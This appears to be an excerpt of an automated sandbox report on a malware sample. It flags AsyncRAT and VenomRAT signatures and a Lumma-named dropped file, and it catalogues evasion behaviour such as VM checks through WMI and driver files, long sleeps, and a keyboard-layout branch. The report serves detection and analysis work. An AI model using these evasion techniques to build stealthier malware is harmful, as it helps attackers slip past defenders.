Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check for Windows Defender sandbox
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe File Queried: C:\INTERNAL\__empty Jump to behavior
Yara detected AsyncRAT
Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected VenomRAT
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Query firmware table information (likely to detect VMs)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe System information queried: FirmwareTableInformation
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\adjijwj API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\adjijwj API/Special instruction interceptor: Address: 7FFE2220D584
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, 00000000.00000002.1718193186.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKNY
Source: adjijwj, 00000003.00000002.1941695773.0000000000540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E000710000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E01A290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E01DA80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 15F3A620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 15F53FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 4900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 4900000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmnet.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmmouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxtray.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxhook.dll Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxservice.exe Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 413 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2145 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 789 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2128 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 873 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Window / User API: threadDelayed 2584 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1638
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6876 Thread sleep time: -214500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6880 Thread sleep time: -78900s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6048 Thread sleep time: -34600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6908 Thread sleep time: -32300s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6876 Thread sleep time: -212800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 4904 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 1516 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 2448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 6828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2248 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4900 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 4556 Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 4268 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6904 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641607000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF6416071AFh 7_2_00007FF641607000
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87FBAE FindFirstFileExW, 20_2_6C87FBAE
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8CC1DF GetSystemInfo,VirtualAlloc, 19_2_6C8CC1DF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: EF14.exe, 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI